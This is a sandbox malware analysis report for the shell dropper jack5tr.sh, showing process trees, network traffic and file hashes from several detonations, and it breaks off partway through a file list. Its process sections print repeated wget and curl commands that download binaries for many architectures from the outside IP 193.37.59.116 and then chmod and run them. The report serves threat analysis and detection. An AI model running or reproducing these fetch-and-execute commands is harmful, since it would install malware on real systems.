Malware Analysis Report

2025-01-23 14:36

Sample ID 240829-x8p5qazajl
Target jack5tr.sh
SHA256 7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a

Threat Level: Shows suspicious behavior

The file jack5tr.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

cURL User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 19:31

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-mipsbe-20240611-en

Max time kernel

34s

Max time network

35s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

180s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x config-err-iEKf7O jack5tr.sh netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN sh4 snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
N/A 224.0.0.251:5353 udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
NL 193.37.59.116:80 193.37.59.116 tcp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
GB 89.187.167.5:443 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.98:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 daisy.ubuntu.com udp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

